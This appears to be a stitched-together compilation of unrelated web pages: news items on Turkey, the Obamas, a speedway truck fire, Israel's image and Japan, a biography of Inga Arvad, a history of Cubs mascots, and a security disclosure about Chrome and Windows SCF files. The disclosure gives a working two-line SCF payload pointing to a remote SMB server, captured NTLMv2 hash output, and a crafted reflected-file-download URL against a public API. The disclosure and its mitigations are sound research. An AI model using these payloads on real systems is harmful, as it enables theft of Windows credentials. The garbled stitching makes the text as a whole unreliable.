The move comes amid heightened concerns throughout Turkey and was accompanied by an updated travel warning advising US citizens of an increased threat of attacks, the Associated Press reported.
The State Department and Pentagon said dependents of American staffers at the US consulate in Adana and the Incirlik airbase and two other locations must leave.
"Foreign and US tourists have been explicitly targeted by international and indigenous terrorist organisations," a State Department statement said. "US citizens are reminded to review personal security plans and remain vigilant at all times."
In a statement, the US military's European Command said the step "allows for the deliberate, safe return of family members from these areas due to continued security concerns in the region".
Erdoğan heads to US
The order comes as Turkey's President Recep Tayyip Erdoğan departed for Washington on Tuesday to attend a nuclear security summit on Thursday and Friday.
There has been intense speculation in the Turkish media as to whether Erdoğan would meet Obama, amid signs of a poor relationship with the US over Syria and Turkey's domestic policy direction.
Yet Erdoğan, speaking to reporters in Istanbul before his departure, said he would have a bilateral meeting with the US president.
"Our colleagues have planned a meeting with Obama, just as we met at the G20," he said. The two leaders last met at a G20 summit in Turkey in November.
"More than 50 leaders are attending the summit upon Obama's invitation, and we are going to talk with a majority of them. We are going to hold a bilateral meeting with Obama," Erdoğan added, saying he did not know how long the meeting would last.
READ MORE: Turkey summons US envoy over support for Syrian Kurds
Obama and Erdoğan will hold an "informal discussion", the White House said on Tuesday.
"I would expect that over the course of the visit, the president will have an opportunity at some point to have at least an informal discussion with President Erdoğan," White House spokesman Josh Earnest told reporters.
Earnest said the lack of a formal meeting should not be interpreted as a snub to Erdoğan, noting the Turkish president will have a formal meeting with US Vice President Joe Biden.
NATO member Turkey is part of the US-led coalition fighting the Islamic State of Iraq and the Levant (ISIL, also known as ISIS), but the two allies are sharply divided over Kurdish fighters in northern Syria.
The Kurdish militia has enjoyed US military support, but Turkey sees it as a threat to its national security.
I'm K.M. Weiland: a fighter, a writer, a child of God. I'm the award-winning and internationally published author of the bestsellingand. I write historical and speculative fiction and mentor authors. Read More
Archive Archives Select Month February 2019 (4) January 2019 (5) December 2018 (5) November 2018 (5) October 2018 (5) September 2018 (4) August 2018 (4) July 2018 (5) June 2018 (4) May 2018 (4) April 2018 (6) March 2018 (5) February 2018 (4) January 2018 (5) December 2017 (4) November 2017 (5) October 2017 (6) September 2017 (7) August 2017 (9) July 2017 (8) June 2017 (11) May 2017 (7) April 2017 (8) March 2017 (10) February 2017 (8) January 2017 (9) December 2016 (9) November 2016 (10) October 2016 (10) September 2016 (10) August 2016 (8) July 2016 (10) June 2016 (10) May 2016 (8) April 2016 (9) March 2016 (11) February 2016 (12) January 2016 (11) December 2015 (10) November 2015 (16) October 2015 (12) September 2015 (9) August 2015 (12) July 2015 (12) June 2015 (10) May 2015 (11) April 2015 (9) March 2015 (13) February 2015 (12) January 2015 (11) December 2014 (13) November 2014 (13) October 2014 (12) September 2014 (12) August 2014 (25) July 2014 (21) June 2014 (14) May 2014 (15) April 2014 (13) March 2014 (14) February 2014 (14) January 2014 (14) December 2013 (14) November 2013 (15) October 2013 (15) September 2013 (24) August 2013 (21) July 2013 (14) June 2013 (15) May 2013 (14) April 2013 (14) March 2013 (15) February 2013 (11) January 2013 (13) December 2012 (13) November 2012 (14) October 2012 (12) September 2012 (12) August 2012 (11) July 2012 (10) June 2012 (9) May 2012 (12) April 2012 (13) March 2012 (14) February 2012 (14) January 2012 (16) December 2011 (12) November 2011 (11) October 2011 (9) September 2011 (15) August 2011 (12) July 2011 (11) June 2011 (13) May 2011 (9) April 2011 (11) March 2011 (11) February 2011 (14) January 2011 (9) December 2010 (10) November 2010 (11) October 2010 (24) September 2010 (11) August 2010 (10) July 2010 (9) June 2010 (10) May 2010 (9) April 2010 (10) March 2010 (10) February 2010 (8) January 2010 (8) December 2009 (6) November 2009 (5) October 2009 (7) September 2009 (8) August 2009 (11) July 2009 (13) June 2009 (5) May 2009 (7) April 2009 (4) March 2009 (3) February 2009 (4) January 2009 (4) December 2008 (4) November 2008 (4) October 2008 (2) September 2008 (2) August 2008 (4) July 2008 (4) June 2008 (3) May 2008 (3) April 2008 (4) March 2008 (4) February 2008 (3) January 2008 (5) December 2007 (3)
WATCH: In Conversation With Oprah, Michelle Obama Tells Men To 'Be Better'
YouTube
Oprah Winfrey and first lady Michelle Obama sat down at The United State of Women summit earlier this week in Washington, D.C.
They spoke at length about women's empowerment and self-worth, but their message to men is getting a lot of attention. Asked what men attending the summit can do, Obama replied "be better."
"Be better at everything. Be better fathers, good lord. Just being good fathers who love your daughters, and are providing a solid example of what it means to be a good man in the world and showing them what it feels like to be loved. That is the greatest gift that the men in my life gave to me."
The fact that she herself never experienced abuse at the hands of a man, Obama said, "is, sad to say, that's a rare reality. So men can be better at that."
Men can also be better husbands, do the dishes, "be engaged ... be a part of your families' lives." Obama also called on men to be "a better employer."
"When you are sitting at a seat of power, at a table of any kind, and you look around and you just see you — it's just you and a bunch of men around a table, on a golf course making deals, and you allow that to happen, and you're OK with that — be better."
Earlier in the conversation, Obama called on women to get to know themselves and learn to prioritize their own needs — the key to balance, she said. "You know why? Because [men] don't have to balance anything. Sorry. I hope that that is changing, but so many men don't have to do it all."
There were also lighthearted moments as Obama spoke about her attraction to her husband. "Good lord. Watching my husband walk off of Marine One and go to the Oval Office, it's like, mmm, mmm, mmm. And you know he's got that walk, right?"
"He was very swagalicious."
Winfrey is a friend of the Obamas and once campaigned for that "swagalicious" president.
As if seven cautions in the first 100 laps of the Quaker State 400 wasn't enough chaos at Kentucky Speedway, the mayhem continued in the parking lot, where a pickup truck caught fire in a big way.
If you look closely, you'll see an enormous grill in the bed of the truck and what might have been a gas can next to it.
Worse yet, Mark Story of the Lexington Herald-Leader later reported on Twitter that there was a person inside the truck when it caught on fire. Fortunately, track officials acted quickly to remove the person before any apparent serious injuries occurred.
Article continues below ...
Ky Speedway GM Mark Simendinger says fire started in cabin of white pickup truck w person inside. Person was pulled out by track responders — Mark Story (@markcstory) July 10, 2016
Simendinger says he believes person pulled from truck did not suffer serious injuries — Mark Story (@markcstory) July 10, 2016
Fire did major damage to white GM truck where it started & silver Nissan car next to it. Also seared a red truck parked on other side — Mark Story (@markcstory) July 10, 2016
Simendinger: 'I always tell our people be prepared, something weird will happen. But we never envisioned this' — Mark Story (@markcstory) July 10, 2016
It's never a good night when the tailgate party goes up in smoke and leaves your ride home — plus a couple others — in total ruins.
Inga Marie Arvad (October 6, 1913 – December 12, 1973) was a Danish journalist, later a U.S. citizen, noted for being a guest of Adolf Hitler at the 1936 Summer Olympics and for her romantic relationship with John F. Kennedy during 1941 and 1942. The juxtaposition of these facts led to suspicions during World War II that she was a Nazi spy. But secret U.S. investigations uncovered no such evidence, and her past did not harm her professional life or social standing in the United States. She was a motion picture writer for Metro-Goldwyn-Mayer in 1945[2] and a Hollywood gossip columnist,[3] and from the late 1940s until her death she was the wife of wealthy cowboy actor and military officer Tim McCoy.
Career as newspaper reporter [ edit ]
Arvad was born in Copenhagen. She later dropped the Petersen from her name in 1931. Arvad was the 1931 beauty queen selected by the Danish newspaper Berlingske Tidende.[4] She was married to Hungarian director Paul Fejos when she immigrated to the United States in 1940.[1]
She attended the Columbia School of Journalism in New York, and then moved to Washington D.C., where she worked as a columnist at the Washington Times-Herald. She met John F. Kennedy in Washington through his sister Kathleen, who was a reporter at the same newspaper. Inga was said to have a good "intuitive style of writing" by her editor.[5]
In 1935, as a freelance reporter,[6] she interviewed Hitler, and this connection to the dictator would color the rest of her life. She is thought to be among the few Scandinavians who interviewed Hitler.[2] He granted her two[7] or, perhaps, three interviews.[3] Arvad had scooped her colleagues earlier by reporting that Hermann Göring was soon to marry German actress Emmy Sonnemann.[6]
She was invited to the wedding and met important Nazis. Through Joseph Goebbels she secured an interview with Hitler.[8] In her article, a description of Hitler was later translated into English as: "You immediately like him. He seems lonely. The eyes, showing a kind heart, stare right at you. They sparkle with force."[4] Arvad was Hitler's guest at the 1936 Summer Olympics, which led to her being investigated by the FBI in America as a potential spy.[6] Hitler had told her that she was a perfect example of Nordic beauty. A photograph of her with Hitler surfaced and the FBI followed her, finding out that she was dating an American ensign, John F. Kennedy, son of the former U.S. ambassador to Britain. Kennedy's prominence led only to greater scrutiny of Arvad and suspicions about her that were never substantiated. Though she wrote only society news and never embraced Hitler's politics, the connection to him shadowed her professional life.
Romance with John F. Kennedy and FBI investigation [ edit ]
In November 1941, while John F. Kennedy served as an ensign in the US Navy's Office of Naval Intelligence, he and Arvad began a romantic relationship.[4] Arvad was already being followed by the FBI due to the fact she was a resident alien and FBI Director J. Edgar Hoover had concerns that she was a German spy, as well as for previously being photographed meeting Hitler. When the FBI discovered that the "ensign Jack" who had been visiting Arvad was, in fact, a Kennedy, they extended their investigation through wiretaps.[6] There was no evidence found to show Arvad, who was married, guilty of "any wrongdoing". But that did not deter Hoover's FBI from the continued use of listening devices when Arvad and Kennedy were together.[9]
Kennedy's superior officer at the time, Captain Seymour A. D. Hunter, was quoted as saying that the U.S. Navy looked at Arvad as similar to Mata Hari. They thought she was using Kennedy to find out all she could about what was going on in the Navy Department. Captain Howard Klingman, then assistant director of the Office of Naval Intelligence, called Hunter into his office. Hunter was told that Kennedy needed to be put out of the Navy. Hunter pointed out that the situation was delicate because of Joseph P. Kennedy's having been United States Ambassador to England. However, he believed the young naval intelligence officer was not privy to information that would be "more than a bit embarrassing". Hunter advised that Kennedy be transferred to a seagoing unit.[3]
Kennedy was reassigned to a desk job in South Carolina in January 1942, and the relationship with Arvad ended after a few brief encounters. Kennedy later stated he thought Hoover might have had something to do with his transfer.[10] Kennedy and Arvad knew they were being followed, and in the FBI transcripts of their encounters they sometimes spoke to "whoever is listening".[citation needed] In the end, Inga reflected on her time with Kennedy as a "passing affair".[11]
Marriages and romances [ edit ]
Arvad's first husband was Kamal Abdel Nabi, whom she married in 1931, when she was 17. Her second husband was Hungarian film director Paul Fejos. She appeared in two Danish films, Storm Varsel and a Fejos-directed 1934 film she starred in, Flight from the Millions. She was still married to Fejos when she traveled to the United States, as well as during her affair with Kennedy. She obtained a divorce from Fejos in June 1942.[12]
She became engaged to Robert Boothby, a British member of Parliament in May 1945. He met Arvad in Los Angeles, California while he was with a British delegation to a conference in San Francisco, California.[2] Boothby sent her a twenty-page letter pleading with her to marry him after he returned to England. Arvad accepted, but then broke off the engagement because of a compliment Hitler once paid her as being "the perfect Nordic beauty" and the effect it might have on Boothby's political career. Arvad commented that she despised Hitler's policies and only saw him on the two occasions of her interviews. However, the English press made much of her audience with him and Boothby was soon to be seeking re-election.[7] Arvad was suspected of being the mistress of Axel Wenner-Gren, a Swedish industrialist on the U.S. State Department blacklist. No proof of such a relationship has ever surfaced.[3]
Arvad married American actor Tim McCoy in 1946 and became a U.S. citizen.[13]
She and McCoy had two sons, Ronald and Terence. Tim McCoy met Inga Arvad when he was making a film short shot on an American Indian reservation. McCoy and Arvad resided on a 127-acre (0.51 km2) estate in Bucks County, Pennsylvania named Dolington Manor, also known as the Benjamin Taylor Homestead[14][better source needed].[13] McCoy moved there after selling his Wyoming ranch, the Eagle's Nest,[15] where he had lived for thirty-seven years. When their first child was born in August 1947, McCoy was 56. He had three children[16] by a previous marriage.[17]
In January 1946 David O. Selznick sent Arvad on a tour of twenty-five to thirty American cities to promote Duel in the Sun. She was accompanied by Anita Colby, Florence Pritchett, and Laura Wells.[18]
Death [ edit ]
Inga Arvad died of cancer on a ranch near Nogales, Arizona in 1973. She was survived by her husband (McCoy) and their two sons.[8] She was buried in the Saginaw's Mount Olivet Cemetery, Michigan.
Chicago Cubs
Clark, the latest victim
In an attempt to be like other baseball teams with their cuddly, family-friendly mascots—and, possibly, their winning records—the Cubs announced their latest hire on Monday: Clark the Cub. Clark is a sweet-looking little fellow. In the cartoon released by the Cubs, he sports a backward baseball cap and insouciantly leans on an upright bat. He does not, however, wear pants, which prompted Deadspin to call him " a nightmarish, perverted furry ." Monday evening a large plush version of Clark with a human inside made his debut at the Advocate Illinois Masonic Medical Center's Pediatric Developmental Center. It was not reported whether he frightened any small children.
The Cubs have concocted an adorable origin story for Clark: growing up in the Lincoln Park Zoo, the young bear heard tales of his great-grandfather Joa's youthful exploits as a Cubs mascot in 1916. He was entranced and delighted. "Then one day," reports the Cubs website, "Clark heard the roar of the crowd coming all the way from Wrigleyville. Determined to finally see the Cubs in person, he followed the sound to Wrigley Field, just in time to see the Cubs raise the W flag." The Cubs management was so impressed by the cub's ability to escape the zoo and walk two miles up Clark Street without getting caught, they decided he must be lucky and made him their new mascot. (Or something like that.)
But, oh, Clark, you should have stayed at the zoo where you were safe. The history of Cubs mascots is rife with tragedy, betrayal, and murder. And losing and futility, but that probably goes without saying.
Back in the early, superstitious days of baseball, a mascot was more than a cute (or scary-looking) team symbol meant to entertain children and sell lots of merchandise. It was a physical embodiment of good luck. Players' children became mascots. So did their wives. Some mascots went pro and transferred their alliances from team to team. Some of them even got paid. The mascot of a minor-league team in Nashville took his duties so seriously that after his release from jail after serving a few days for selling stolen goods (the great baseball writer Grantland Rice helped plead his case), the first thing he did was race to the ballpark to take his place on the bench. Most mascots were living creatures, but during the 1910s, the White Sox claimed a silver dollar given to one of the players by team owner Charles Comiskey. Comiskey was a notorious skinflint, so it was a rare and precious object.
MLB.com
The last successful Cubs mascot, 1908.
Anyone could be a mascot. In 1909, the Cubs attempted to claim President William Howard Taft, who was passing through town and decided to take in a game. "When it was over, somebody asked the President which side he rooted for," reported Charles Dryden in the Examiner. "Mr. Taft's reply was very diplomatic, if not guarded. 'I'm from Cincinnati, and besides I've got a bad cold and can't smell very well.' It is repartee like this that lands people in the White House." The Cubs lost to the Giants, their most bitter rivals. "He's no mascot," the Tribune grumbled the next day. Ring Lardner blamed the loss on "a bad attack of Taftitis."
Being a mascot could be a degrading, even heartbreaking business. In 1908, Tigers outfielder Ty Cobb picked up a black teenager named Ulysses Harrison in Saint Louis and declared him "the very thing for a bat boy and mascot." Harrison traveled with the team until the final game of the World Series in Detroit where the Cubs defeated the Tigers. The Tigers decided he was no longer useful and abandoned him. According to the Examiner, a Cubs player found Harrison in tears. "I'm busted, boss," he said. "I ain't got a dollar and I can't get back home. They say they ain't got any more use for me here." The Cubs brought the former mascot back to Chicago, where a group of friendly fans took up a collection for his train ticket home.
The Cubs occasionally had human mascots, but, aside from managers' children, their tenures were short-lived. (An exception was the Fat Boy, Paul Dominick, who was given credit for a 21-game winning streak in 1935 and then left for Hollywood.) Instead, they seemed to prefer animals—who, it should be noted, did not demand salaries. The 1908 world champions had Bud, a Boston bull terrier puppy with an adorable curved tail, and a grotesque-looking fake polar bear. The 1913 team had a homicidal gamecock, named Tampa after their spring training home. (Tampa's mascotting career seems to have ended when he murdered another rooster.) In 1915, they had another dog, a terrier named Toy. But mostly they had live cubs.
Library of Congress
A bear cub in 1914, possibly Clara Maduro.
Why anyone thought having live bears around, even small bears, was a good idea remains a mystery. The bears were nasty. The 1914 mascot, an Alaskan import named Clara Maduro, was judged "too strong and determined in its ways to be among peaceable people," reported the Tribune. She was scheduled for execution, but was given a reprieve and instead served a life sentence in the Lincoln Park Zoo. The 1910 Cubs hated their mascot, an unnamed bear sent from Spokane, Washington, so much they planted it in the rival Giants' clubhouse. "We hope [Giants manager John McGraw] kicked the stuffing out of the little beast to get even," wrote Dryden, who was the city's finest chronicler of team mascots, "for it has been biting the regular Cubs on the ankle and we have enough cripples on the team."
They didn't even bring the team luck. "These bear mascots are a hoodoo," Dryden complained in 1916. "They had a flock of them at the world's series in 1906 and the Cubs lost with ease." (Note how he had already adopted that tone of resignation and cynicism characteristic of anyone who has to write about the Cubs. And he actually saw them win the World Series!)
Still, far-off fans kept sending the Cubs new baby bears. Inevitably, a tragedy occurred, as reported by the Examiner on January 27, 1916:
No one grieved the assassination of the mascot. Instead, the Cubs replaced it with young Clark's great-grandpa Joa.
Joa's origins are unclear. It's possible he was a gift to Cubs co-owner Charley Weeghman from a friend who had shot the bear's mother during a hunting trip in Wisconsin. Or maybe he was donated by another co-owner, J. Ogden Armour, a meat-packing magnate. (Or maybe the Cubs were given three bears in 1916?) Whatever the case, he was named after Armour: JOA.
Armour's factory was the model for Upton Sinclair's The Jungle. He was one of the richest and also one of the most loathed men in Chicago. Dryden refused to refer to the bear by its Armour name. "The proper name of the newest bear mascot is Jonah," he wrote, "but they have abbreviated it to Joa. The n and h are silent."
MLB.com
Joa in paradise
Joa lived in a cage outside Wrigley Field (then known as Weeghman Park). He wore a collar of solid silver. He made his official major-league debut on June 20. Predictably, the Cubs lost a doubleheader to the Reds. Within a week, four of the team's best players landed on the DL. Nonetheless, Dryden wrote, "Jonah the bear mascot is allowed to continue his evil career. They are building a concrete bungalow for Jonah back of his cage, which would indicate that he intends to mascot in his own peculiar way until all the Cubs are dead and buried."
Joa's disposition could be surly. He clawed at least one player. (Thus prompting a dietary suggestion from Dryden: "They should arrange meatless days for Jonah. Everybody is doing it.") Worst of all, the Cubs finished the 1916 season in fifth place. Despite all this, he accompanied the team to spring training in 1917, where, at least according to Dryden anyway, the team barber was instructed to shampoo him between shaves to get rid of the filth accumulated during a winter in the Lincoln Park Zoo. Even in the middle of the season, he was still doing his bit, sitting in his cage and chewing his chain.
The team's fortunes did not improve. Weeghman finally gave up on Joa and sold him to the Lincoln Park Zoo for $20. The Cubs finished fifth again, but with a slightly better record. There's no record of whether he encountered Clara Maduro or any other former mascots there, and what painful stories they shared about their mascotting careers. Too bad young Clark didn't listen to them. Or maybe he did—SBNation has pointed out how dead his eyes look. What dark and horrible circumstances could have forced a little bear to voluntarily sell himself into mascot-hood?
Attacks that leak authentication credentials using the SMB file sharing protocol on Windows OS are an ever-present issue, exploited in various ways but usually limited to local area networks. One of the rare research involving attacks over the Internet was presented by Jonathan Brossard and Hormazd Billimoria at the Black Hat security conference in 2015.
However, there have been no publicly demonstrated SMB authentication related attacks on browsers other than Internet Explorer and Edge in the past decade. This article describes an attack which can lead to Windows credentials theft, affecting the default configuration of the most popular browser in the world today, Google Chrome, as well as all Windows versions supporting it.
The problem
With its default configuration, Chrome browser will automatically download files that it deems safe without prompting the user for a download location but instead using the preset one. From a security standpoint, this feature is not an ideal behavior but any malicious content that slips through still requires a user to manually open/run the file to do any damage. However, what if the downloaded file requires no user interaction to perform malicious actions? Are there file types that can do that?
Windows Explorer Shell Command File or SCF (.scf) is a lesser known file type going back as far as Windows 98. Most Windows users came across it in Windows 98/ME/NT/2000/XP where it was primarily used as a Show Desktop shortcut. It is essentially a text file with sections that determine a command to be run (limited to running Explorer and toggling Desktop) and an icon file location. Taken as an example, this is how Show Desktop SCF file contents looked like:
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
As with Windows shortcut LNK files, the icon location is automatically resolved when the file is shown in Explorer. Setting an icon location to a remote SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares. But what is the difference between LNK and SCF from the attack standpoint? Chrome sanitizes LNK files by forcing a .download extension ever since Stuxnet but does not give the same treatment to SCF files.
SCF file that can be used to trick Windows into an authentication attempt to a remote SMB server contains only two lines, as shown in the following example:
[Shell]
IconFile=\\170.170.170.170\icon
Once downloaded, the request is triggered the very moment the download directory is opened in Windows File Explorer to view the file, delete it or work with other files (which is pretty much inevitable). There is no need to click or open the downloaded file – Windows File Explorer will automatically try to retrieve the “icon “.
The remote SMB server set up by the attacker is ready to capture the victim's username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password. The captured information may look like the following:
[*] SMB Captured - 2017-05-15 13:10:44 +0200
NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182
USER:Bosko DOMAIN:Master OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:98daf39c3a253bbe4a289e7a746d4b24 NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e0000000002000000000000 0000000000
Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06f cdd201ccf26d91cd9e326e00000000020000000000000000000000
The above example shows a disclosure of victim's username, domain and NTLMv2 password hash.
It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings. Therefore, file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to inconspicuous nature of attacks using SCF files.
Impact
Password disclosure
For users in Active Directory domains (corporate, government and other networks), password disclosure can have various impacts ranging from escalating internal network breaches to accessing externally available NTLM-enabled services and breaches based on password reuse.
For Windows 8/10 users that are using a Microsoft Account (MSA) instead of a local account, the password disclosure impacts all the Microsoft services that are integrated with the MSA SSO such as OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live and others. The common problem of password reuse can lead to more account breaches unrelated to MSA.
Regarding password cracking feasibility, this improved greatly in the past few years with GPU-based cracking. NetNTLMv2 hashcat benchmark for a single Nvidia GTX 1080 card is around 1600 MH/s. That's 1.6 billion hashes per second. For an 8-character password, GPU rigs of 4 such cards can go through an entire keyspace of upper/lower alphanumeric + most commonly used special characters (!@#$%&) in less than a day. With hundreds of millions leaked passwords resulted from several breaches in the past years (LinkedIn, Myspace), wordlist rule-based cracking can produce surprising results against complex passwords with more entropy.
The situation is even worse for Windows XP systems and networks where backwards compatibility with NTLMv1 has been explicitly enabled. In those cases, a downgrade attack can be performed forcing the client to authenticate with a weaker hash/protocol (such as NTLMv1 or even LM) instead of NTLMv2. This enables the attacker to capture a hash which can be cracked many times faster than NTLMv2 – in the case of LM often within seconds using precomputed tables for reversing cryptographic hash functions (“Rainbow tables”).
SMB relay attacks
Organizations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as authentication method, may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without having to crack the password. This was successfully demonstrated by Jonathan Brossard at the Black Hat security conference.
Under certain conditions (external exposure) an attacker may even be able to relay credentials to a domain controller on the victim's network and essentially get internal access to the network.
Antivirus Handling of SCF
Naturally, when a browser fails to warn on or sanitize downloads of potentially dangerous file types, one relies on security solutions to do that work instead. We tested several leading antivirus solutions by different vendors to determine if any solution will flag the downloaded file as dangerous.
All tested solutions failed to flag it as anything suspicious, which we hope will change soon. SCF file analysis would be easy to implement as it only requires inspection of IconFile parameter considering there are no legitimate uses of SCF with remote icon locations.
Introducing new attack vectors
Although using social engineering to entice the victim to visit the attacker's website as well as open redirection and cross site scripting vulnerabilities on trusted websites are the most common attack vectors to deliver malicious files, for this attack I would like to add an often disregarded and lesser known vulnerability that could serve the same purpose, hoping it would bring attention to its impact.
Reflected file download
First described by Oren Hafif, the Reflected File Download vulnerability occurs when a specially crafted user input is reflected in the website response and downloaded by the user's browser when the certain conditions are met. It was initially used as an attack vector to trick the user into running malicious code (usually from a Windows batch file), based on the user's trust in the vulnerable domain.
Since SCF format is rather simple and our attack requires only two lines that can be preceded and followed by (almost) anything, it creates perfect conditions to be used with RFD.
RFD is usually aimed at RESTful API endpoints as they often use permissive URL mapping, which allows for setting the extension of the file in the URL path. Chrome will not download most of typical API response content types directly so these would have to be forced through a download attribute in a href=… link tags. However, there are exceptions. Chrome uses MIME-sniffing with text/plain content type and if the response contains a non-printable character it will be downloaded as a file directly and automatically unless the “nosniff” directive is set.
This can be demonstrated on World Bank API, using the following URL:
http://api.worldbank.org/v2/country/indicator/iwantyourhash.scf?prefix=
%0A[Shell]%0AIconFile=\\170.170.170.170\test%0Alol=%0B&format=jsonp
Due to the non-printable character %0B Chrome will download the response as iwantyourhash.scf file. The moment the download directory containing the file is opened Windows will try to authenticate to the remote SMB server, disclosing the victim's authentication hashes.
Recommendations
In order to disable automatic downloads in Google Chrome, the following changes should be made: Settings -> Show advanced settings -> Check the Ask where to save each file before downloading option. Manually approving each download attempt significantly decreases the risk of NTLMv2 credential theft attacks using SCF files.
As SCF files still pose a threat the measures that need to be taken depend on affected users network environment and range from simple host level hardening and configuring perimeter firewall rules to applying additional security measures such as SMB packet signing and Extended Protection. With the first two the goal is to prevent SMB traffic from leaving the corporate environment by blocking ports that can be used to initiate a connection with a potentially malicious Internet-based SMB server. When possible, SMB traffic should always be restricted to private networks.
Conclusion
Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his web site to be able to proceed and reuse victim's authentication credentials. Even if the victim is not a privileged user (for example, an administrator), such vulnerability could pose a significant threat to large organisations as it enables the attacker to impersonate members of the organisation. Such an attacker could immediately reuse gained privileges to further escalate access and perform attacks on other users or gain access and control of IT resources.
We hope that the Google Chrome browser will be updated to address this flaw in the near future.
Bosko Stankovic is a Senior Security Engineer at DefenseCode, a provider of static and dynamic application security testing.
(CNN) Former President Barack Obama will sit side-by-side with German Chancellor Angela Merkel Thursday in the first event of what will eventually become his worldwide program to inspire young people to create change.
Obama will join Merkel at the Brandenburg Gate in Berlin to highlight his foundation's new global effort to inspire and support young people active in narrowing inequality, combating climate change, working on public health, empowering women and girls and boosting young entrepreneurs.
"He and Mrs. Obama have been pretty clear that the foundation will have a global reach. They want to be really involved in programing throughout the world," an Obama Foundation official said.
JUST WATCHED Obama: Merkel on the 'right side of history' Replay More Videos ... MUST WATCH Obama: Merkel on the 'right side of history' 00:46
The program will draw on Obama's own heritage as a grassroots organizer who built a campaign from the bottom up and eventually created a political movement with his 2008 election victory. Obama also held events during almost every foreign tour he made as President, talking to young people about their aspirations and ideas. But his new venture won't be confined to politics.
"When they're talking about young leaders they are not just talking about politicians, they are talking about who is the person, let's say, in the Brazilian rainforest who is working on really amazing renewable energy ideas," the foundation official said.
Read More
Israel's name is being tarnished in the media and its reputation is threatened by delegitimization, the Israeli Consul General of New York told a Manhattan crowd last week.
The “progressive elite” and intellectuals who want to dismantle the State of Israel are of great concern, added Ido Aharoni, a veteran diplomat who worked on “branding” Israel in 2007 in Jerusalem.
Aharoni's comments, which reflected a deepening unease about Israel's image in the West, were made to a crowd of about 50 who ate his remarks up at the CORE Club, an elite Manhattan space where the rich gather to eat, relax and attend events on politics and culture. The occasion for Aharoni's short speech was an event meant to showcase The Tower, a magazine and website published by The Israel Project, an organization that pushes Israel's side of the story to journalists. Aharoni added that he hoped for The Tower to be an incubator for a real, fact-based discussion of Israeli policy.
The Israeli Consul General delivered a broadside against media outlets that focus on the Israel/Palestine conflict instead of other domestic Israeli issues.
“Our Minister of Finance, Yair Lapid, who was elected on a strictly domestic agenda–social justice brought him to power–he's in charge of dividing the Israeli budget and distributing it. Yet when he's approached by the American media, the only thing they ask him about is the Israeli-Palestinian conflict,” said Aharoni. “The New York Times ran a story that they were somehow disappointed that [the Israeli social justice movement in 2011] were not marching because of the conflict. I'm telling you all of this because, you should know, Israel is like any other country. We have issues. We have problems. We have car accidents, we have friction between various groups.”
The address by Aharoni came a day after similar themes, albeit in more hysterical terms, were aired at Yeshiva University's panel titled, “Will Jews Exist?” There, Rabbi Shmuley Boteach repeatedly brought up Israel's negative image, particularly on college campuses. While overall poll numbers don't bear out Boteach's and Aharoni's concerns, there is comparably less support for Israel among young Jews. But the lament that Israel's image is nosediving also feeds the notion, pushed by the Israeli government, that Israel is an underdog surrounded by implacable enemies.
Aharoni also touched on other themes, saying that the Arab uprisings have boosted “political Islam” and have proved that the “linkage” argument is bunk. (He mischaracterized the “linkage” argument as one that posited that the root of all problems in the Middle East is because of Israel/Palestine.)
The panel discussion that followed Aharoni's address veered all over the place, touching on women's rights and the geopolitical situation Israel finds itself. The discussion, moderated by Tower editor David Hazony, featured Slate writer Dahlia Lithwick, Israel Project CEO Josh Block and Gabriel Scheinmann, a PhD candidate at Georgetown University and a fellow at the hawkish Jewish Institute for National Security Affairs.
The panel featured some interesting conversation and surprising nuance for a talk convened by a pro-Israel group. In response to a question about what the U.S. role in the Middle East should be, Scheinmann suggested that the U.S. should ally with Russia because of a shared fear of radical Islam and also ally with Iran–though not the regime itself–because of that same fear of radical Sunni Islam.
But the conversation circled back to Israel's image in the U.S. One questioner in the audience fretted about the “demonization” of the state on college campuses. The panelists agreed it was a problem.
Block, a former spokesperson for the American Israel Public Affairs Committee, answered the question by deriding “Arabists” in the State Department, where he used to work.
“There are 22 members of the Arab League, and each of them has a desk at the State Department. That desk is staffed by foreign service officers who make a career of representing their clients,” Block explained. “So you've got an inbred kind-of industry in the foreign policy establishment and in dialogue fomenting a perspective that is not sympathetic to Israel.”
Block said that it's not enough to talk about Israel beyond the conflict. He explained that it's important to confront arguments against Israel with the facts, instead of skirting the conflict with the Palestinians, and suggested that efforts to do so would fail. “Afrikaaners loved Mozart and wine too. In South Africa, there were terrible things going on, but they were cultured and smart people,” he said.
In response to the questioner who mentioned Israel's image on campus, Slate's Lithwick, said, “I feel the same way. I'm terrified to send my kids to college.”
Japan, one of the world's most densely populated countries, is a volcanic archipelago located between the Sea of Japan and the Pacific Ocean.
In the mid-nineteenth century, following more than 200 years of cultural isolation, Japan began a period of rapid modernization and military expansion that ended with its defeat in World War II and the signing of a pacifist constitution. The country experienced rapid economic growth following the war and, despite a major downturn in the 1990s, has remained an economic superpower. Prime Minister Shinzo Abe, prompted by a perceived threat from China, a decrease in American military presence and recent territorial disputes, has called for a reinterpretation of the constitution to allow for strengthening of Japan's armed forces.
Japan is a hotspot for seismic activity and in 2011 experienced its strongest-ever earthquake followed by a tsunami, which killed thousands of people and severely damaged several nuclear power facilities.
Scroll below to learn more about Japan using our article archive and chronology of breaking news.
Called "arguably the greatest American in the 20th century," during his 95 years, Norman Borlaug probably saved more lives than any other person.
He is one of just six people to win the Nobel Peace Prize, the Congressional Gold Medal and the Presidential Medal of Freedom. And yet Borlaug, who died three years ago today, is scarcely known in his own country.
